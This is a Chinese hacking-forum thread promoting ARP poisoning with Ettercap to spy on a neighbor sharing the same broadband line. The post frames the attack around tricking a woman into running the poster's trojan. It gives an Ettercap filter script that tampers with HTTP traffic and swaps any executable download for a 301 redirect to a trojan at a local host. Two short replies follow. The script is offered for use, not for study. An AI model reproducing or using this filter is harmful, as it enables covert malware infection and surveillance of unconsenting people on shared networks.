查看: 11198|回复: 2

[工具专区] Ettercap ARP毒化-猜猜你的邻居在干什么?

[复制链接]
发表于 2014-1-5 17:59:17 | 显示全部楼层 |阅读模式
本帖最后由 mianhua 于 2014-1-5 18:03 编辑

是不是和自己的邻居用的一条宽带?

是不是有时候感觉自己很卡?

是不是很想知道他在干什么?

想知道的话看完你就知道了

前几日在某个论坛看到说他利用netfuke写了一个js进行挂马

我认为不现实,且不说js挂马会有提示IE会阻拦

而且妹子也不会下载的

如果你利用这个就很好搞定了

不管妹子下载什么东西都会替换成你的木马,由不得她不点开

Ettercap用到的规则
[Python] 纯文本查看 复制代码
# replace rmccurdy with your website
 
# replace the url with what ever exe you like
 
 
 
if (ip.proto == TCP && tcp.dst == 80) {
 
if (search(DATA.data, "Accept-Encoding")) {
 
replace("Accept-Encoding", "Accept-Rubbish!");
 
# note: replacement string is same length as original string
 
msg("zapped Accept-Encoding!n");
 
}
 
}
 
if (ip.proto == TCP && tcp.src == 80) {
 
replace("keep-alive", "close" ");
 
replace("Keep-Alive", "close" ");
 
 
 
}
 
 
 
if (ip.proto == TCP && search(DATA.data, ": application") ){
 
# enable for logging log(DECODED.data, "/tmp/log.log");
 
msg("found EXEn");
 
# "Win32" is the first part of the exe example:
 
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
 
if (search(DATA.data, "Win32")) {
 
msg("doing nothingn");
 
} else {
 
replace("200 OK", "301 Moved Permanently
 
Location: http://192.168.1.100:8080/sz.exe
 
");
 
msg("redirect successn");
 
 
 
}
 
}


相关文章:


演示地址:链接: http://pan.baidu.com/s/1hqsnYtA 密码: 6qy9
回复

使用道具 举报

发表于 2014-1-5 20:54:57 | 显示全部楼层
ARP欺骗,以前在局域网实践过。容易把网搞乱
回复 支持 反对

使用道具 举报

发表于 2016-10-1 10:35:23 | 显示全部楼层
亲,虽然有点挖坟的意思,但是还是想请您提供一下演示过程
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-10 20:35 , Processed in 0.028240 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部